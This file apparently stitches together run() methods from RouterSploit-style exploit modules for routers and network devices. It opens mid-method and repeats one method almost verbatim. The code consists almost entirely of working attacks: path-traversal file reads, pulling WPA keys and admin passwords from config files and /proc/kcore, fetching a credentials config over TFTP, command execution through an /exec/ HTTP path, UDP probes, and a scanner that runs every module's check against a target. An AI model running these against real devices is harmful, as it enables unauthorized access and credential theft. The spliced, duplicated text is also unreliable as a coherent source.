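        print_success("Target seems to be vulnerable")
        url = r"{}:{}/imc/report/DownloadReportSource?dirType=webapp&fileDir=reports&fileName=reportParaExample.xml..\..\..\..\..\..\..\..\..\..{}".format(self.target, self.port, self.filename)

        print_status("Sending paylaod request")
        response = http_request(method="GET", url=url)
        if response is None:
            return

        if response.status_code == 200 and len(response.text):
            print_success("Exploit success - reading {} file".format(self.filename))
            print_info(response.text)
        else:
            print_error("Exploit failed - could not retrieve response")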
    def run(self):
        """Try each path in ``self.resources`` and print the ones that expose a password.

        A 200 reply whose body contains ``password`` is printed; any other
        reply is reported per resource. A missing reply (``None``) stops the
        loop entirely. Returns None.
        """
        for resource in self.resources:
            resource_url = "{}:{}{}".format(self.target, self.port, resource)

            print_status("Sending request to download sensitive information")
            reply = http_request(method="GET", url=resource_url)
            if reply is None:
                return

            exposed = reply.status_code == 200 and "password" in reply.text
            if not exposed:
                print_error("Exploit failed - could not retrieve response")
                continue

            print_success("Exploit success")
            print_status("Reading {} file".format(resource))
            print_info(reply.text)
    def run(self):
        """Read ``self.filename`` with a plain ``/../../..`` traversal off the web root.

        A non-empty 200 reply is printed as the file. Returns None.
        """
        if not self.check():
            print_error("Device seems to be not vulnerable")
            return

        traversal_url = "{}:{}/../../../../../../../../../../../..{}".format(
            self.target, self.port, self.filename)

        reply = http_request(method="GET", url=traversal_url)
        if reply is None:
            return

        if reply.status_code != 200 or not reply.text:
            print_error("Exploit failed")
            return

        print_success("Success! File: %s" % self.filename)
        print_info(reply.text)
 def run(self):
     """Run ``self.show_command`` through the ``/level/<n>/exec/-/`` HTTP interface.

     The URL embeds ``self.access_level`` and the command; the reply has its
     HTML tags stripped with a regex before printing. A missing reply is
     reported as "could not execute". Returns None.
     """
     if not self.check():
         print_error("Exploit failed - target seems to be not vulnerable")
         return

     print_success("Target is vulnerable")
     exec_url = "{}:{}/level/{}/exec/-/{}".format(self.target, self.port,
                                                 self.access_level,
                                                 self.show_command)
     reply = http_request(method="GET", url=exec_url)
     if reply is None:
         # No reply at all: treated as not vulnerable.
         print_error("Could not execute command")
         return

     print_success("Exploit success! - executing command")
     # Crude tag stripper: drop every <...> run so only the text survives.
     print_info(re.sub('<[^<]+?>', '', reply.text))
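    def run(self):
        """Send ``self.payload`` over UDP to port 43690 and print the reply.

        One datagram is sent, then up to 1024 bytes of reply are awaited for
        10 s (a longer datagram is truncated by ``recv``). A timeout or any
        other error while receiving is reported as "not vulnerable". Returns
        None.

        Fixes: the socket is now closed on every path (it was never closed),
        and an empty reply is reported instead of being silently ignored.
        """
        sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
        sock.settimeout(10)

        try:
            print_status("Sending exploit payload")
            sock.sendto(self.payload, (self.target, 43690))

            try:
                print_status("Waiting for response")
                response = sock.recv(1024)
            except Exception:
                print_error("Exploit failed - device seems to be not vulnerable")
                return

            if len(response):
                print_success("Exploit success")
                print_info(response)
            else:
                print_error("Exploit failed - empty response")
        finally:
            sock.close()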
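    def run(self):
        """Send ``self.payload`` over UDP to port 43690 and print the reply.

        One datagram is sent, then up to 1024 bytes of reply are awaited for
        10 s (a longer datagram is truncated by ``recv``). A timeout or any
        other error while receiving is reported as "not vulnerable". Returns
        None.

        Fixes: the bare ``except:`` (which also swallowed KeyboardInterrupt and
        SystemExit) is narrowed to ``Exception``; the socket is now closed on
        every path; an empty reply is reported instead of silently ignored.
        """
        sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
        sock.settimeout(10)

        try:
            print_status("Sending exploit payload")
            sock.sendto(self.payload, (self.target, 43690))

            try:
                print_status("Waiting for response")
                response = sock.recv(1024)
            except Exception:
                print_error("Exploit failed - device seems to be not vulnerable")
                return

            if len(response):
                print_success("Exploit success")
                print_info(response)
            else:
                print_error("Exploit failed - empty response")
        finally:
            sock.close()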
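    def run(self):
        """Read ``self.filename`` through ``/imc/report/DownloadReportSource``.

        The ``fileName`` parameter carries a backslash ``..\\`` chain after the
        expected report name; a non-empty 200 reply is printed as the file.
        Returns None.

        Fixes: the URL is now a raw string -- the original relied on ``\\.``
        being an unrecognised escape that Python keeps verbatim (a
        DeprecationWarning/SyntaxWarning on newer interpreters); the runtime
        value is unchanged. A non-200/empty reply is now reported instead of
        ending silently, matching the sibling ``run`` methods in this file.
        """
        if not self.check():
            print_error("Exploit failed - target seems to be not vulnerable")
            return

        print_success("Target seems to be vulnerable")
        url = r"{}:{}/imc/report/DownloadReportSource?dirType=webapp&fileDir=reports&fileName=reportParaExample.xml..\..\..\..\..\..\..\..\..\..{}".format(
            self.target, self.port, self.filename)

        print_status("Sending paylaod request")
        response = http_request(method="GET", url=url)
        if response is None:
            return

        if response.status_code == 200 and len(response.text):
            print_success("Exploit success - reading {} file".format(
                self.filename))
            print_info(response.text)
        else:
            print_error("Exploit failed - could not retrieve response")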
    def run(self):
        """Fetch the path stored in ``self.valid`` and print it.

        ``self.valid`` is not set here -- presumably ``self.check()`` stores
        the path it found exposed; confirm against that method. A non-empty
        200 reply is printed, anything else reported. Returns None.
        """
        if not self.check():
            print_error("Exploit failed - target seems to be not vulnerable")
            return

        print_success("Target seems to be vulnerable")
        resource_url = "{}:{}{}".format(self.target, self.port, self.valid)

        print_status("Sending request to download sensitive information")
        reply = http_request(method="GET", url=resource_url)
        if reply is None:
            return

        if reply.status_code != 200 or not reply.text:
            print_error("Exploit failed - could not retrieve response")
            return

        print_status("Reading {}".format(self.valid))
        print_info(reply.text)
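    def run(self):
        """Send ``self.payload`` to UDP/69 and print the reply if it carries credentials.

        One datagram is sent (presumably a TFTP read request for
        ``SPDefault.cnf.xml`` -- confirm against ``self.payload``), then up to
        2048 bytes of reply are awaited for 10 s. The reply is printed only when
        it contains ``UseUserCredential``. Returns None.

        Fixes: the bare ``except:`` (which also swallowed KeyboardInterrupt and
        SystemExit) is narrowed to ``Exception``; the socket is now closed on
        every path; the marker is a bytes literal so the ``in`` test works on
        the bytes ``recv`` returns under Python 3 as well (identical on 2).
        """
        sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
        sock.settimeout(10)

        try:
            print_status("Sending payload")
            sock.sendto(self.payload, (self.target, 69))

            try:
                response = sock.recv(2048)
            except Exception:
                print_error("Exploit failed - device seems to be not vulnerable")
                return

            if not len(response):
                print_error("Exploit failed - empty response")
                return

            if b"UseUserCredential" in response:
                print_success("Exploit success - file SPDefault.cnf.xml")
                print_info(response)
            else:
                print_error("Exploit failed - credentials not found in response")
        finally:
            sock.close()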
    def run(self):
        """Pull three resources from the device web server and print findings.

        Does nothing when ``self.check()`` fails. Otherwise, in order: the
        RT2870STA.dat file (scanned for ``WPAPSK``), get_status.cgi (scanned
        for ``ddns_host``), and a streamed read of /proc/kcore in which every
        100-byte chunk containing ``admin`` is printed. Any exception raised
        during the streamed read (including a ``None`` response) is reported
        as a failure; the first two requests tolerate ``None`` explicitly.
        """
        if not self.check():
            return

        print_success("Target is vulnerable")
        sta_url = "{}:{}//etc/RT2870STA.dat".format(self.target, self.port)
        status_url = "{}:{}/get_status.cgi".format(self.target, self.port)
        kcore_url = "{}:{}//proc/kcore".format(self.target, self.port)

        resp = http_request(method="GET", url=sta_url)
        found_psk = resp is not None and "WPAPSK" in resp.text
        if found_psk:
            print_success("WPA Password is in this text:")
            print_info(resp.text)
        else:
            print_error("Could not find WPA password")

        print_info("Trying to gather more info")
        resp = http_request(method="GET", url=status_url)
        found_ddns = resp is not None and "ddns_host" in resp.text
        if found_ddns:
            print_success("ddns host name:")
            print_info(resp.text)
        else:
            print_error("could not read ddns host name")

        print_status("Trying to find username and password from running memory leak")
        print_status("This could take some time")
        print_status("password is usually stuck next to 'admin' e.g admin123456")
        resp = http_request(method="GET", url=kcore_url, stream=True)
        try:
            # A None response raises AttributeError here and is reported below.
            chunks = resp.iter_content(chunk_size=100)
            for piece in chunks:
                if "admin" not in piece:
                    continue
                print_success(piece)
        except Exception:
            print_error("Exploit failed - could not read /proc/kcore")
    def run(self):
        """POST the redirect-path form to enhAuthHandler and print the reply.

        Prints an error when ``self.check()`` reports the target as not
        vulnerable. The response body is printed as the contents of
        ``self.filename``; a ``None`` response ends the run silently.
        """
        if not self.check():
            print_error("Target seems to be not vulnerable")
            return

        print_success("Target is vulnerable")

        print_status("Sending read {} file request".format(self.filename))
        endpoint = "{}:{}/goform/enhAuthHandler".format(self.target, self.port)

        form_headers = {u"Content-Type": u"application/x-www-form-urlencoded"}

        redirect_path = "/pages/C_4_0.asp/../../..{}".format(self.filename)
        form = {
            "__ENH_SHOW_REDIRECT_PATH__": redirect_path,
            "__ENH_SUBMIT_VALUE_SHOW__": "Acceder",
            "__ENH_ERROR_REDIRECT_PATH__": "",
            "username": "******",
        }

        resp = http_request(method="POST", url=endpoint, headers=form_headers, data=form)
        if resp is None:
            return

        print_status("Reading file {}".format(self.filename))
        print_info(resp.text)
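    def run(self):
        """Read ``self.filename`` via the ``/help/`` path and print it.

        Prints an error when ``self.check()`` fails. On a 200 response with
        a non-empty body, the device's HTML/script prelude — everything up
        to and including the ``//--></SCRIPT>`` marker and the line break
        after it — is stripped before printing; when the marker is absent
        the body is printed unchanged. A ``None`` response ends the run
        silently.
        """
        if not self.check():
            print_error("Exploit failed - target seems to be not vulnerable")
            return

        print_success("Target is vulnerable")
        url = "{}:{}/help/../../../../../../../../../../../../../../../..{}".format(self.target, self.port, self.filename)

        print_status("Sending payload request")
        response = http_request(method="GET", url=url)
        if response is None:
            return

        if response.status_code == 200 and len(response.text):
            text = response.text
            marker = "//--></SCRIPT>"
            start = text.find(marker)
            # Skip the marker plus the line break that follows it (the old
            # hard-coded +15). Previously a missing marker (find() == -1)
            # silently dropped the first 14 characters; keep the body whole.
            res = text[start + len(marker) + 1:] if start >= 0 else text

            if len(res):
                print_status("Reading file {}".format(self.filename))
                print_info(res)
            else:
                print_error("Could not read file {}".format(self.filename))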
 def run(self):
     """Report the check result and point the operator at the login page.

     When ``self.check()`` flags the target, prints ``self.content``
     (presumably filled in by ``check()`` — confirm in the module) and then
     the chklogin.cgi URL; otherwise prints an error.
     """
     if not self.check():
         print_error("Exploit failed - target seems to be not vulnerable")
         return

     print_success("Target seems to be vulnerable")
     login_url = "{}:{}/cgi-bin/chklogin.cgi".format(self.target, self.port)
     for line in (self.content, "please login at:", login_url):
         print_info(line)
    def run(self):
        """Run every exploit module's ``check()`` against the current target.

        Walks ``routersploit/modules/exploits/<device>/*.py`` (relative to
        the working directory), loads each file with ``imp.load_source``,
        points its ``Exploit`` instance at ``self.target``/``self.port`` and
        calls ``check()``. ``True`` is reported as vulnerable, ``False`` as
        not vulnerable and any other value as "could not be verified".
        Ends with a summary of the vulnerable module paths.
        """
        rootpath = 'routersploit/modules/'
        path = 'exploits'

        modules = []
        # Every entry that is not a .py/.pyc file is taken to be a device
        # directory; only its direct .py children (minus __init__.py) are
        # collected, as "<device>/<name>" without the extension.
        for device in listdir(rootpath+path):  # TODO refactor this, using load_modules() from core
            if not device.endswith(".py") and not device.endswith(".pyc"):
                for f in listdir(rootpath+path + "/" + device):
                    if f.endswith(".py") and f != "__init__.py":
                        modules.append(device + "/" + f[:-3])

        vulnerabilities = []
        for module_name in modules:
            f = "".join((path, "/", module_name))

            # Every file is loaded under the same module name, 'module'.
            module = imp.load_source('module', rootpath + f + '.py')
            exploit = module.Exploit()

            exploit.target = self.target
            exploit.port = self.port

            response = exploit.check()

            # Identity comparison: only the literal True/False count; None or
            # anything else falls through to "could not be verified".
            if response is True:
                print_success("{} is vulnerable".format(f))
                vulnerabilities.append(f)
            elif response is False:
                print_error("{} is not vulnerable".format(f))
            else:
                print_status("{} could not be verified".format(f))

        if vulnerabilities:
            # Bare print statement (Python 2 syntax): emits a blank line.
            print
            print_success("Device is vulnerable!")
            for v in vulnerabilities:
                print_info(" - {}".format(v))
        else:
            print_error("Device is not vulnerable to any exploits!\n")